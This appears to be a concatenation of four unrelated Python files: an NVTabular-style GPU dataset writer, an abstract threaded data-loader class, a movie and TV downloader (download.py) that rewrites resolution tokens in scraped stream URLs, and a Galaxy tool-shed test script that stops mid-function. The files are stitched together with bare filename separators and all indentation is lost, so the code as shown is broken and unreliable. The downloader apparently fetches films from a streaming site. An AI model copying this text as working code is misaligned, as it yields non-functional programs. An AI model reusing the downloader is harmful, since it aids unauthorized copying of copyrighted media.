# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import json
import math
import queue
import threading
import cupy as cp
import numpy as np
from cudf.utils.dtypes import is_list_dtype
from fsspec.core import get_fs_token_paths
from nvtx import annotate
class Writer:
def __init__(self):
pass
def add_data(self, gdf):
raise NotImplementedError()
def package_general_metadata(self):
raise NotImplementedError()
@classmethod
def write_general_metadata(cls, data, fs, out_dir):
raise NotImplementedError()
@classmethod
def write_special_metadata(cls, data, fs, out_dir):
raise NotImplementedError()
def close(self):
pass
class ThreadedWriter(Writer):
def __init__(
self,
out_dir,
num_out_files=30,
num_threads=0,
cats=None,
conts=None,
labels=None,
shuffle=None,
fs=None,
use_guid=False,
bytes_io=False,
):
# set variables
self.out_dir = out_dir
self.cats = cats
self.conts = conts
self.labels = labels
self.shuffle = shuffle
self.column_names = None
if labels and conts:
self.column_names = labels + conts
self.col_idx = {}
self.num_threads = num_threads
self.num_out_files = num_out_files
self.num_samples = [0] * num_out_files
self.data_paths = None
self.need_cal_col_names = True
self.use_guid = use_guid
self.bytes_io = bytes_io
# Resolve file system
self.fs = fs or get_fs_token_paths(str(out_dir))[0]
# Only use threading if num_threads > 1
self.queue = None
if self.num_threads > 1:
# create thread queue and locks
self.queue = queue.Queue(num_threads)
self.write_locks = [threading.Lock() for _ in range(num_out_files)]
# signifies that end-of-data and that the thread should shut down
self._eod = object()
# create and start threads
for _ in range(num_threads):
write_thread = threading.Thread(target=self._write_thread, daemon=True)
write_thread.start()
def set_col_names(self, labels, cats, conts):
self.cats = cats
self.conts = conts
self.labels = labels
self.column_names = labels + conts
def _write_table(self, idx, data, has_list_column=False):
return
def _write_thread(self):
return
@annotate("add_data", color="orange", domain="nvt_python")
def add_data(self, gdf):
# Populate columns idxs
if not self.col_idx:
for i, x in enumerate(gdf.columns.values):
self.col_idx[str(x)] = i
# list columns in cudf don't currently support chunked writing in parquet.
# hack around this by just writing a single file with this partition
# this restriction can be removed once cudf supports chunked writing
# in parquet
if any(is_list_dtype(gdf[col].dtype) for col in gdf.columns):
self._write_table(0, gdf, True)
return
# Generate `ind` array to map each row to an output file.
# This approach is certainly more optimized for shuffling
# than it is for non-shuffling, but using a single code
# path is probably worth the (possible) minor overhead.
nrows = gdf.shape[0]
typ = np.min_scalar_type(nrows * 2)
if self.shuffle:
ind = cp.random.choice(cp.arange(self.num_out_files, dtype=typ), nrows)
else:
ind = cp.arange(nrows, dtype=typ)
cp.floor_divide(ind, math.ceil(nrows / self.num_out_files), out=ind)
for x, group in enumerate(
gdf.scatter_by_map(ind, map_size=self.num_out_files, keep_index=False)
):
self.num_samples[x] += len(group)
if self.num_threads > 1:
self.queue.put((x, group))
else:
self._write_table(x, group)
# wait for all writes to finish before exiting
# (so that we aren't using memory)
if self.num_threads > 1:
self.queue.join()
def package_general_metadata(self):
data = {}
if self.cats is None:
return data
data["data_paths"] = self.data_paths
data["file_stats"] = []
for i, path in enumerate(self.data_paths):
fn = path.split(self.fs.sep)[-1]
data["file_stats"].append({"file_name": fn, "num_rows": self.num_samples[i]})
# cats
data["cats"] = []
for c in self.cats:
data["cats"].append({"col_name": c, "index": self.col_idx[c]})
# conts
data["conts"] = []
for c in self.conts:
data["conts"].append({"col_name": c, "index": self.col_idx[c]})
# labels
data["labels"] = []
for c in self.labels:
data["labels"].append({"col_name": c, "index": self.col_idx[c]})
return data
@classmethod
def write_general_metadata(cls, data, fs, out_dir):
if not data:
return
data_paths = data.pop("data_paths", [])
num_out_files = len(data_paths)
# Write file_list
file_list_writer = fs.open(fs.sep.join([out_dir, "_file_list.txt"]), "w")
file_list_writer.write(str(num_out_files) + "\n")
for f in data_paths:
file_list_writer.write(f + "\n")
file_list_writer.close()
# Write metadata json
metadata_writer = fs.open(fs.sep.join([out_dir, "_metadata.json"]), "w")
json.dump(data, metadata_writer)
metadata_writer.close()
@classmethod
def write_special_metadata(cls, data, fs, out_dir):
pass
def _close_writers(self):
for writer in self.data_writers:
writer.close()
return None
def close(self):
if self.num_threads > 1:
# wake up all the worker threads and signal for them to exit
for _ in range(self.num_threads):
self.queue.put(self._eod)
# wait for pending writes to finish
self.queue.join()
# Close writers and collect various metadata
_general_meta = self.package_general_metadata()
_special_meta = self._close_writers()
# Move in-meomory file to disk
if self.bytes_io:
self._bytesio_to_disk()
return _general_meta, _special_meta
def _bytesio_to_disk(self):
raise NotImplementedError("In-memory buffering/shuffling not implemented for this format.")
|
data.py
|
import threading
from functools import wraps
from abc import ABCMeta, abstractmethod
import numpy as np
class DatasetSplit(object):
"""Represent a dataset split such as training or validation. Is meant to
be used as an organized dictionary to help BaseDataLoader
"""
def __init__(self, name, filepaths):
self.name, self.filepaths = name, filepaths
self.n_files = len(self.filepaths)
self.file_shuffle = list(range(self.n_files))
self.file_cursor = 0
self.next, self.current = None, None
self.current_len, self.current_index_shuffle, self.cursor = 0, [0], 0
self.did_load_first_megabatch = False
self.thread = None
class BaseDataLoader(object, metaclass=ABCMeta):
"""All data loaders should inherit from this one. This provides common
functionality for parallel data loading. The children must implement
the interface of abstractmethods.
When inheriting, remember to give your child a name
"""
def __init__(self, hps, data_directory):
# check if children are not messing up
if not hasattr(self, "name"):
raise Exception("You must give your data loader a reference name")
self.hps = hps if isinstance(hps, dict) else dict(hps.values())
self.data_directory = data_directory
self.splits = self.get_data_splits()
self.splits = {split.name: split for split in self.splits}
for s, split in self.splits.items():
split.file_cursor = 0
split.file_shuffle = self.reshuffle_file_indices(s, split.filepaths)
selected_file = split.filepaths[split.file_shuffle[split.file_cursor]]
split.thread = threading.Thread(
target=self.load_next_megabatch, args=(s, selected_file))
split.thread.start()
# debug
# split.thread.join()
@classmethod
def parse_hparams(cls, params):
"""Overrides the default sets of parameters.
It is done this way so that the caller can save those parameters
however they want to
"""
hps = cls.default_hparams()
if params is not None:
hps = hps.parse(params)
return hps
def check_if_split_is_ready(function):
"""Decorator to check if the first megabatch of data was loaded
from the chosen split. This is useful for every function that uses
the splits directly
"""
@wraps(function)
def wrapper(inst, split_name, *args, **kwargs):
if not inst.splits[split_name].did_load_first_megabatch:
inst.splits[split_name].did_load_first_megabatch = True
inst._swap_used_set_for_preloaded_one(split_name)
return function(inst, split_name, *args, **kwargs)
return wrapper
def _swap_used_set_for_preloaded_one(self, split_name):
split = self.splits[split_name]
# swap the megabatches
split.thread.join()
split.current = split.next
# shuffle indices (or not, it is the child's choice)
split.current_index_shuffle = self.reshuffle_sample_indices(split_name, split.current)
split.current_len = len(split.current_index_shuffle)
# advance file cursor and check if we finished the split
split.file_cursor += 1
did_run_through_all_data = split.file_cursor == split.n_files
if did_run_through_all_data:
split.file_cursor = 0
split.file_shuffle = self.reshuffle_file_indices(split_name, split.filepaths)
selected_file = split.filepaths[split.file_shuffle[split.file_cursor]]
# only load next megabatch if there is more than one to load
if split.n_files > 1:
print("[INFO] Swapped data megabatches for split {}".format(split_name))
split.thread = threading.Thread(
target=self.load_next_megabatch, args=(split_name, selected_file))
split.thread.start()
self.did_swap_megabatches(split)
return did_run_through_all_data
def set_future_data_for_split(self, split_name, data):
"""Set next data megabatch for given split. This method must be used
by the child in load_next_megabatch to guarantee proper functioning
of the parallel loading scheme
"""
self.splits[split_name].next = data
def sample_iterator(self, split_name, batch_size):
"""Iterate through the current index shuffle of the selected split.
This index shuffle is a list of indexes that reference the current
loaded file for the split.
This iterator can stop for either returning a full batch of indices,
or because the split itself was finished (all its files were read
to completion). The reason is indicated by iterator_status, returned
on every iteration
"""
iterator_status = 'running'
counter = 0
while iterator_status == 'running':
# check for end_of_batch, notice that the end_of_split status
# takes priority as it is set later
counter += 1
iterator_status = 'end_of_batch' if counter >= batch_size else 'running'
# swap files if we reached the end of the current one
if self.splits[split_name].cursor >= self.splits[split_name].current_len:
end_of_split = self._swap_used_set_for_preloaded_one(split_name)
iterator_status = 'end_of_split' if end_of_split else iterator_status
self.splits[split_name].cursor = 0
# get the current place in the split (the cursor)
cursor = self.splits[split_name].current_index_shuffle[self.splits[split_name].cursor]
self.splits[split_name].cursor += 1
yield cursor, iterator_status
@check_if_split_is_ready
def batch_iterator(self, split_name, batch_size, stop_at_end_of_split):
"""Iterate through batches of samples in selected split (split_name).
This will use the get_sample function on the child to obtain each
sample.
:param split_name: The selected split (one of those returned by
get_data_splits)
:param batch_size: Each batch will have this number of samples or
less (if we reach end of split)
:param stop_at_end_of_split: Indicates wether the iterator stops at
end of split (e.g. for eval on test sets) or keeps running forever
(e.g. for training)
:return: a python generator that yields (batch_size, *sample) arrays
"""
iterator_status = 'running'
while not stop_at_end_of_split or not iterator_status == 'end_of_split':
samples = []
for idx, iterator_status in self.sample_iterator(split_name, batch_size):
sample = self.get_sample(self.splits[split_name].current, idx)
for i, element in enumerate(sample):
if len(samples) == i:
samples.append([element])
else:
samples[i].append(element)
samples = [np.array(element) for element in samples]
yield self.preprocess_batch(samples)
@check_if_split_is_ready
def get_n_samples_from(self, split_name, n, shuffled=False, seeded=None, preprocess=False):
"""Get n samples from current loaded file of selected split
:param split_name: The selected split (one of those returned by
get_data_splits)
:param n: number of samples the user wants returned
:param suffled: to shuffle or not to shuffle indices
:param seeded: if true, should return the same n samples every call,
with the disclaimer that for a split that is written over many
files, this will only guarantee the same samples for the same
loaded file
:return: a (n, *sample) array
"""
if seeded is not None:
np.random.seed(int(seeded))
if shuffled:
indices = np.random.permutation(self.splits[split_name].current_len)[:n]
else:
indices = list(range(n))
if seeded is not None:
np.random.seed()
samples = []
for idx in indices:
sample = self.get_sample(self.splits[split_name].current, idx)
for i, element in enumerate(sample):
if len(samples) == i:
samples.append([element])
else:
samples[i].append(element)
samples = [np.array(element) for element in samples]
if preprocess:
return self.preprocess_batch(samples)
else:
return samples
@check_if_split_is_ready
def get_n_samples_batch_iterator_from(self, split_name, n, batch_size, shuffled=False, seeded=None, preprocess=False):
"""Get n samples from current loaded file of selected split
:param split_name: The selected split (one of those returned by
get_data_splits)
:param n: number of samples the user wants returned
:param suffled: to shuffle or not to shuffle indices
:param seeded: if true, should return the same n samples every call,
with the disclaimer that for a split that is written over many
files, this will only guarantee the same samples for the same
loaded file
:return: a (n, *sample) array
"""
if seeded is not None:
np.random.seed(int(seeded))
if shuffled:
indices = np.random.permutation(self.splits[split_name].current_len)[:n]
else:
indices = list(range(n))
if seeded is not None:
np.random.seed()
for i in range(0, n, batch_size):
end_idx = i + batch_size if i + batch_size < n else n
samples = []
for idx in indices[i:end_idx]:
sample = self.get_sample(self.splits[split_name].current, idx)
for i, element in enumerate(sample):
if len(samples) == i:
samples.append([element])
else:
samples[i].append(element)
samples = [np.array(element) for element in samples]
yield self.preprocess_batch(samples)
@check_if_split_is_ready
def get_all_data_from(self, split_name):
"""Return the split's (split_name) data from current loaded file.
This is not the same as returning the entire set, as it regards only
the current loaded file.
"""
return self.preprocess_batch(self.get_n_samples_from(
split_name, n=self.splits[split_name].current_len))
def preprocess_batch(self, samples):
"""Hook for child loaders to add some preprocessing to batches
"""
return samples
@classmethod
@abstractmethod
def default_hparams(cls):
"""Children should provide their own list of hparams. These should
regard preprocessing styles and data formatting in general
"""
pass
@abstractmethod
def get_data_splits(self):
"""Return a list of DatasetSplit objects, containing the name and
the list of file for each split of the dataset
"""
pass
@abstractmethod
def get_sample(self, data, idx):
"""Return a single sample, using idx as a reference. This should be
a complete sample, containing all data (e.g. labels and images)
"""
pass
@abstractmethod
def reshuffle_file_indices(self, split_name, filenames):
"""Return a shuffled list of indices referencing the files on
the filenames list. Use the split_name to control how to shuffle
(e.g. train splits are shuffled and test splits are not)
"""
pass
@abstractmethod
def reshuffle_sample_indices(self, split_name, data):
"""Return a shuffled list of indices referencing the data on
the data parameter. Use the split_name to control how to shuffle
(e.g. train splits are shuffled and test splits are not)
"""
pass
@abstractmethod
def load_next_megabatch(self, split_name, selected_file):
"""Load the selected file, do any necessary preprocessing on the data
and finally call set_future_data_for_split with the resulting data.
This will guarantee that parallel loading keeps loading different files
"""
pass
def did_swap_megabatches(self, split):
"""Maybe the child wants to do something after a swap (?)
"""
pass
|
download.py
|
# -*- coding: utf-8 -*-
# filename : download.py
# description : Handles downloading of movies
# author : LikeToAccess
# email : liketoaccess@protonmail.com
# date : 08-01-2021
# version : v2.0
# usage : python main.py
# notes :
# license : MIT
# py version : 3.8.2 (must run on 3.6 or higher)
#==============================================================================
import os
from threading import Thread
import requests
from requests.exceptions import *
from urllib3.exceptions import SSLError
from scraper import Scraper
from stream import Stream
import config as cfg
import media
from media import log
headers = {"user-agent": cfg.user_agent}
resolution_list = cfg.video_quality
media_files = media.Media("MOVIES")
home = os.getcwd()
requests.adapters.HTTPAdapter(max_retries=cfg.max_retries)
def url_format(url, target_res, old_res="360"):
url = url.replace(f"/{old_res}?name=",f"/{target_res}?name=")
url = url.replace(f"_{old_res}&token=ip=",f"_{target_res}&token=ip=")
return url
def validate_url(url, target_res=None):
if target_res:
url = url_format(url, target_res)
error_message = ""
try:
request = requests.get(
url,
headers=headers,
proxies=(cfg.proxy if cfg.proxy else None),
stream=True,
timeout=(30,60)
)
status_code = request.status_code
except ConnectionError:
error_message = " (check the port on the proxy?)"
status_code = 403
request = None
print(f"STATUS for {target_res}p: {status_code}{error_message}" if target_res else None)
return status_code, request
class Download:
def __init__(self, url, metadata, author):
self.url = url
self.metadata = metadata
self.author = author
def best_quality(self, url):
if not url:
log("ERROR: No URL! Maybe there were no search results?", silent=False)
return False, None, None
if not isinstance(url, str):
url = url.get_attribute("src")
valid_resolutions = []
for target_res in resolution_list: # TODO: The proccess of checking every resolution's status code takes too long (fix me)
valid_resolution, request = validate_url(url, target_res)
valid_resolutions.append(valid_resolution)
if valid_resolutions[-1] == 200:
url = url_format(url, target_res)
break
if valid_resolutions[-1] == 403:
filmname = self.metadata["data-filmname"]
log(f"ERROR: Link expired while scraping \"{filmname}\".")
return False, None, None
if 200 not in valid_resolutions:
log(f"ERROR: Status code {valid_resolutions[-1]}.")
return False, None, None
return url, request, target_res
def run(self, resolution_override=None):
# Function should return True when the download is complete and False if it perminantly failed
self.url, request, resolution = self.best_quality(self.url)
if self.url is False:
return False
filmname = self.metadata["data-filmname"]
year = self.metadata["data-year"]
if "Season" in filmname and "Episode" in filmname:
print("Media is detected as TV Show.")
show_title = filmname.split(" - ")[0]
season = filmname.split(" - Season ")[1].split(" Episode")[0].split(" [")[0]
season = season if len(season) >= 2 else "0" + season
episode = filmname.split(" Episode ")[1].split(": ")[0]
try:
episode_title = filmname.split(": ")[(1 if " [" not in filmname else 2)]
# filename = f"{show_title} - s{season}ep{episode} - {episode_title}"
filename = f"{show_title} - s{season}ep{episode}"
except IndexError:
filename = f"{show_title} - s{season}ep{episode}"
absolute_path = os.path.abspath(
f"../TV SHOWS/{show_title}/Season {season}/{filename}.crdownload"
)
else:
print("Media is detected as Movie/Film.")
filename = (f"{filmname} ({year})" if filmname[-1] != ")" else filmname)
absolute_path = os.path.abspath(f"../MOVIES/{filename}/{filename}.crdownload")
stream = Stream(
request,
absolute_path,
(
resolution_override if resolution_override else resolution
),
)
stream.stream()
filename = filename.replace(".crdownload", ".mp4")
file_size = round(int(request.headers.get("content-length", 0))/1024/1024,2)
media.credit(self.author, filename=filename, resolution=resolution, file_size=file_size)
log(f"Finished download of {filename} in {resolution}p ({file_size} MB).", silent=False)
return True
if __name__ == "__main__":
def run_download(url, metadata, author):
download_function = Download(url, metadata, author)
threaded_download = Thread(target=download_function.run)
threaded_download.start()
scraper = Scraper(minimize=False)
search = input("Enter a Title to search for:\n> ")
while search:
download_queue = scraper.download_first_from_search(search)
if download_queue:
for data in download_queue:
if None in data:
log("No results!", silent=False)
run_download(data[0], data[1][list(data[1])[0]], data[2])
search = input("Enter a Title to search for:\n> ")
else:
log("No results!", silent=False)
|
functional_tests.py
|
#!/usr/bin/env python
# NOTE: This script cannot be run directly, because it needs to have test/functional/test_toolbox.py in sys.argv in
# order to run functional tests on repository tools after installation. The install_and_test_tool_shed_repositories.sh
# will execute this script with the appropriate parameters.
import os, sys, shutil, tempfile, re, string, urllib, platform
from time import strftime
# Assume we are run from the galaxy root directory, add lib to the python path
cwd = os.getcwd()
sys.path.append( cwd )
test_home_directory = os.path.join( cwd, 'test', 'install_and_test_tool_shed_repositories' )
default_test_file_dir = os.path.join( test_home_directory, 'test_data' )
# Here's the directory where everything happens. Temporary directories are created within this directory to contain
# the database, new repositories, etc.
galaxy_test_tmp_dir = os.path.join( test_home_directory, 'tmp' )
default_galaxy_locales = 'en'
default_galaxy_test_file_dir = "test-data"
os.environ[ 'GALAXY_INSTALL_TEST_TMP_DIR' ] = galaxy_test_tmp_dir
new_path = [ os.path.join( cwd, "lib" ), os.path.join( cwd, 'test' ), os.path.join( cwd, 'scripts', 'api' ) ]
new_path.extend( sys.path )
sys.path = new_path
from galaxy import eggs
eggs.require( "nose" )
eggs.require( "NoseHTML" )
eggs.require( "NoseTestDiff" )
eggs.require( "twill==0.9" )
eggs.require( "Paste" )
eggs.require( "PasteDeploy" )
eggs.require( "Cheetah" )
eggs.require( "simplejson" )
# This should not be required, but it is under certain conditions, thanks to this bug: http://code.google.com/p/python-nose/issues/detail?id=284
eggs.require( "pysqlite" )
import install_and_test_tool_shed_repositories.functional.test_install_repositories as test_install_repositories
import install_and_test_tool_shed_repositories.base.test_db_util as test_db_util
import functional.test_toolbox as test_toolbox
import atexit, logging, os, os.path, sys, tempfile, simplejson
import twill, unittest, time
import sys, threading, random
import httplib, socket
from paste import httpserver
# This is for the galaxy application.
import galaxy.app
from galaxy.app import UniverseApplication
from galaxy.web import buildapp
from galaxy.util import parse_xml
from galaxy.util.json import from_json_string, to_json_string
from tool_shed.util.shed_util_common import url_join
import nose.core
import nose.config
import nose.loader
import nose.plugins.manager
from nose.plugins import Plugin
from base.util import parse_tool_panel_config, get_database_version, get_test_environment, get_repository_current_revision
from common import update
log = logging.getLogger( 'install_and_test_repositories' )
default_galaxy_test_port_min = 10000
default_galaxy_test_port_max = 10999
default_galaxy_test_host = '127.0.0.1'
# Optionally, set the environment variable GALAXY_INSTALL_TEST_TOOL_SHEDS_CONF
# to the location of a tool sheds configuration file that includes the tool shed
# that repositories will be installed from.
tool_sheds_conf_xml = '''<?xml version="1.0"?>
<tool_sheds>
<tool_shed name="Galaxy main tool shed" url="http://toolshed.g2.bx.psu.edu/"/>
<tool_shed name="Galaxy test tool shed" url="http://testtoolshed.g2.bx.psu.edu/"/>
</tool_sheds>
'''
# Create a blank shed_tool_conf.xml to hold the installed repositories.
shed_tool_conf_xml_template = '''<?xml version="1.0"?>
<toolbox tool_path="${shed_tool_path}">
</toolbox>
'''
# Since we will be running functional tests, we'll need the upload tool, but the rest can be omitted.
tool_conf_xml = '''<?xml version="1.0"?>
<toolbox>
<section name="Get Data" id="getext">
<tool file="data_source/upload.xml"/>
</section>
</toolbox>
'''
# If we have a tool_data_table_conf.test.xml, set it up to be loaded when the UniverseApplication is started.
# This allows one to specify a set of tool data that is used exclusively for testing, and not loaded into any
# Galaxy instance. By default, this will be in the test-data-repo/location directory generated by buildbot_setup.sh.
if os.path.exists( 'tool_data_table_conf.test.xml' ):
additional_tool_data_tables = 'tool_data_table_conf.test.xml'
additional_tool_data_path = os.environ.get( 'GALAXY_INSTALL_TEST_EXTRA_TOOL_DATA_PATH', os.path.join( 'test-data-repo', 'location' ) )
else:
additional_tool_data_tables = None
additional_tool_data_path = None
# Also set up default tool data tables.
if os.path.exists( 'tool_data_table_conf.xml' ):
tool_data_table_conf = 'tool_data_table_conf.xml'
elif os.path.exists( 'tool_data_table_conf.xml.sample' ):
tool_data_table_conf = 'tool_data_table_conf.xml.sample'
else:
tool_data_table_conf = None
# And set up a blank shed_tool_data_table_conf.xml.
tool_data_table_conf_xml_template = '''<?xml version="1.0"?>
<tables>
</tables>
'''
# The tool shed url and api key must be set for this script to work correctly. Additionally, if the tool shed url does not
# point to one of the defaults, the GALAXY_INSTALL_TEST_TOOL_SHEDS_CONF needs to point to a tool sheds configuration file
# that contains a definition for that tool shed.
galaxy_tool_shed_url = os.environ.get( 'GALAXY_INSTALL_TEST_TOOL_SHED_URL', None )
tool_shed_api_key = os.environ.get( 'GALAXY_INSTALL_TEST_TOOL_SHED_API_KEY', None )
exclude_list_file = os.environ.get( 'GALAXY_INSTALL_TEST_EXCLUDE_REPOSITORIES', 'install_test_exclude.xml' )
if tool_shed_api_key is None:
print "This script requires the GALAXY_INSTALL_TEST_TOOL_SHED_API_KEY environment variable to be set and non-empty."
exit( 1 )
if galaxy_tool_shed_url is None:
print "This script requires the GALAXY_INSTALL_TEST_TOOL_SHED_URL environment variable to be set and non-empty."
exit( 1 )
if 'GALAXY_INSTALL_TEST_SECRET' not in os.environ:
galaxy_encode_secret = 'changethisinproductiontoo'
os.environ[ 'GALAXY_INSTALL_TEST_SECRET' ] = galaxy_encode_secret
else:
galaxy_encode_secret = os.environ[ 'GALAXY_INSTALL_TEST_SECRET' ]
testing_single_repository = {}
if 'repository_name' in os.environ and 'repository_owner' in os.environ:
testing_single_repository[ 'name' ] = os.environ[ 'repository_name' ]
testing_single_repository[ 'owner' ] = os.environ[ 'repository_owner' ]
if 'repository_revision' in os.environ:
testing_single_repository[ 'changeset_revision' ] = os.environ[ 'repository_revision' ]
else:
testing_single_repository[ 'changeset_revision' ] = None
class ReportResults( Plugin ):
'''Simple Nose plugin to record the IDs of all tests run, regardless of success.'''
name = "reportresults"
passed = dict()
def options( self, parser, env=os.environ ):
super( ReportResults, self ).options( parser, env=env )
def configure(self, options, conf):
super( ReportResults, self ).configure( options, conf )
if not self.enabled:
return
def addSuccess( self, test ):
'''Only record test IDs that correspond to tool functional tests.'''
if 'TestForTool' in test.id():
test_id = test.id()
# Rearrange the test ID to match the format that is produced in test_results.failures
test_id_parts = test_id.split( '.' )
fixed_test_id = '%s (%s)' % ( test_id_parts[ -1 ], '.'.join( test_id_parts[ :-1 ] ) )
test_parts = fixed_test_id.split( '/' )
owner = test_parts[ -4 ]
name = test_parts[ -3 ]
test_identifier = '%s/%s' % ( owner, name )
if test_identifier not in self.passed:
self.passed[ test_identifier ] = []
self.passed[ test_identifier ].append( fixed_test_id )
def getTestStatus( self, test_identifier ):
if test_identifier in self.passed:
passed_tests = self.passed[ test_identifier ]
del self.passed[ test_identifier ]
return passed_tests
return []
def execute_uninstall_method( app ):
# Clean out any generated tests.
remove_generated_tests( app )
sa_session = app.model.context.current
repositories_to_uninstall = sa_session.query( app.model.ToolShedRepository ).all()
for repository in repositories_to_uninstall:
if repository.status == app.model.ToolShedRepository.installation_status.UNINSTALLED:
continue
if repository.status not in [ app.model.ToolShedRepository.installation_status.UNINSTALLED,
app.model.ToolShedRepository.installation_status.ERROR,
app.model.ToolShedRepository.installation_status.INSTALLED ]:
repository.status = app.model.ToolShedRepository.installation_status.ERROR
sa_session.add( repository )
sa_session.flush()
name = str( repository.name )
owner = str( repository.owner )
changeset_revision = str( repository.installed_changeset_revision )
log.debug( 'Changeset revision %s of repository %s queued for uninstallation.', changeset_revision, name )
repository_dict = dict( name=name, owner=owner, changeset_revision=changeset_revision )
# Generate a test method to uninstall this repository through the embedded Galaxy application's web interface.
test_install_repositories.generate_uninstall_method( repository_dict )
# Set up nose to run the generated uninstall method as a functional test.
test_config = nose.config.Config( env=os.environ, plugins=nose.plugins.manager.DefaultPluginManager() )
test_config.configure( sys.argv )
# Run the uninstall method. This method uses the Galaxy web interface to uninstall the previously installed
# repository and delete it from disk.
result, _ = run_tests( test_config )
success = result.wasSuccessful()
return success
def get_api_url( base, parts=[], params=None, key=None ):
if 'api' in parts and parts.index( 'api' ) != 0:
parts.pop( parts.index( 'api' ) )
parts.insert( 0, 'api' )
elif 'api' not in parts:
parts.insert( 0, 'api' )
url = url_join( base, *parts )
if key:
url += '?%s' % urllib.urlencode( dict( key=key ) )
else:
url += '?%s' % urllib.urlencode( dict( key=tool_shed_api_key ) )
if params:
url += '&%s' % params
return url
def get_latest_downloadable_changeset_revision( url, name, owner ):
api_url_parts = [ 'api', 'repositories', 'get_ordered_installable_revisions' ]
params = urllib.urlencode( dict( name=name, owner=owner ) )
api_url = get_api_url( url, api_url_parts, params )
changeset_revisions = json_from_url( api_url )
if changeset_revisions:
return changeset_revisions[ -1 ]
else:
return '000000000000'
def get_repository_info_from_api( url, repository_info_dict ):
parts = [ 'api', 'repositories', repository_info_dict[ 'repository_id' ] ]
api_url = get_api_url( base=url, parts=parts )
extended_dict = json_from_url( api_url )
latest_changeset_revision = get_latest_downloadable_changeset_revision( url, extended_dict[ 'name' ], extended_dict[ 'owner' ] )
extended_dict[ 'latest_revision' ] = str( latest_changeset_revision )
return extended_dict
def get_repository_tuple_from_elem( elem ):
attributes = elem.attrib
name = attributes.get( 'name', None )
owner = attributes.get( 'owner', None )
changeset_revision = attributes.get( 'changeset_revision', None )
return ( name, owner, changeset_revision )
def get_repositories_to_install( tool_shed_url, latest_revision_only=True ):
'''
Get a list of repository info dicts to install. This method expects a json list of dicts with the following structure:
[
{
"changeset_revision": <revision>,
"encoded_repository_id": <encoded repository id from the tool shed>,
"name": <name>,
"owner": <owner>,
"tool_shed_url": <url>
},
...
]
NOTE: If the tool shed URL specified in any dict is not present in the tool_sheds_conf.xml, the installation will fail.
'''
assert tool_shed_api_key is not None, 'Cannot proceed without tool shed API key.'
params = urllib.urlencode( dict( do_not_test='false',
downloadable='true',
malicious='false',
includes_tools='true',
skip_tool_test='false' ) )
api_url = get_api_url( base=tool_shed_url, parts=[ 'repository_revisions' ], params=params )
base_repository_list = json_from_url( api_url )
log.info( 'The api returned %d metadata revisions.', len( base_repository_list ) )
known_repository_ids = {}
detailed_repository_list = []
for repository_to_install_dict in base_repository_list:
# We need to get some details from the tool shed API, such as repository name and owner, to pass on to the
# module that will generate the install methods.
repository_info_dict = get_repository_info_from_api( galaxy_tool_shed_url, repository_to_install_dict )
if repository_info_dict[ 'latest_revision' ] == '000000000000':
continue
owner = repository_info_dict[ 'owner' ]
name = repository_info_dict[ 'name' ]
changeset_revision = repository_to_install_dict[ 'changeset_revision' ]
repository_id = repository_to_install_dict[ 'repository_id' ]
# We are testing deprecated repositories, because it is possible that a deprecated repository contains valid
# and functionally correct tools that someone has previously installed. Deleted repositories have never been installed,
# and therefore do not need to be checked. If they are undeleted, this script will then test them the next time it runs.
if repository_info_dict[ 'deleted' ]:
log.info( "Skipping revision %s of repository id %s (%s/%s) since the repository is deleted...",
changeset_revision,
repository_id,
name,
owner )
continue
# Now merge the dict returned from /api/repository_revisions with the detailed dict we just retrieved.
if latest_revision_only:
if changeset_revision == repository_info_dict[ 'latest_revision' ]:
detailed_repository_list.append( dict( repository_info_dict.items() + repository_to_install_dict.items() ) )
else:
detailed_repository_list.append( dict( repository_info_dict.items() + repository_to_install_dict.items() ) )
repositories_tested = len( detailed_repository_list )
if latest_revision_only:
skipped_previous = ' and metadata revisions that are not the most recent'
else:
skipped_previous = ''
if testing_single_repository:
log.info( 'Testing single repository with name %s and owner %s.',
testing_single_repository[ 'name' ],
testing_single_repository[ 'owner' ])
for repository_to_install in detailed_repository_list:
if repository_to_install[ 'name' ] == testing_single_repository[ 'name' ] \
and repository_to_install[ 'owner' ] == testing_single_repository[ 'owner' ]:
if testing_single_repository[ 'changeset_revision' ] is None:
return [ repository_to_install ]
else:
if testing_single_repository[ 'changeset_revision' ] == repository_to_install[ 'changeset_revision' ]:
return [ repository_to_install ]
return []
log.info( 'After removing deleted repositories%s from the list, %d remain to be tested.', skipped_previous, repositories_tested )
return detailed_repository_list
def get_tool_info_from_test_id( test_id ):
'''
Test IDs come in the form test_tool_number (functional.test_toolbox.TestForTool_toolshed_url/repos/owner/repository_name/tool_id/tool_version)
We want the tool ID and tool version.
'''
parts = test_id.replace( ')', '' ).split( '/' )
tool_version = parts[ -1 ]
tool_id = parts[ -2 ]
return tool_id, tool_version
def get_tool_test_results_from_api( tool_shed_url, metadata_revision_id ):
api_path = [ 'api', 'repository_revisions', metadata_revision_id ]
api_url = get_api_url( base=tool_shed_url, parts=api_path )
repository_metadata = json_from_url( api_url )
tool_test_results = repository_metadata.get( 'tool_test_results', {} )
# If, for some reason, the script that checks for functional tests has not run, tool_test_results will be None.
if tool_test_results is None:
return dict()
return tool_test_results
def is_latest_downloadable_revision( url, repository_info_dict ):
latest_revision = get_latest_downloadable_changeset_revision( url, name=repository_info_dict[ 'name' ], owner=repository_info_dict[ 'owner' ] )
return str( repository_info_dict[ 'changeset_revision' ] ) == str( latest_revision )
def json_from_url( url ):
url_handle = urllib.urlopen( url )
url_contents = url_handle.read()
try:
parsed_json = from_json_string( url_contents )
except:
log.exception( 'Error parsing JSON data.' )
raise
return parsed_json
def parse_exclude_list( xml_filename ):
'''
This method should return a list with the following structure:
[
{
'reason': The default reason or the reason specified in this section,
'repositories':
[
( name, owner, changeset revision if changeset revision else None ),
( name, owner, changeset revision if changeset revision else None )
]
},
{
'reason': The default reason or the reason specified in this section,
'repositories':
[
( name, owner, changeset revision if changeset revision else None ),
( name, owner, changeset revision if changeset revision else None )
]
},
]
'''
exclude_list = []
exclude_verbose = []
xml_tree = parse_xml( xml_filename )
tool_sheds = xml_tree.findall( 'repositories' )
xml_element = []
exclude_count = 0
for tool_shed in tool_sheds:
if galaxy_tool_shed_url != tool_shed.attrib[ 'tool_shed' ]:
continue
else:
xml_element = tool_shed
for reason_section in xml_element:
reason_text = reason_section.find( 'text' ).text
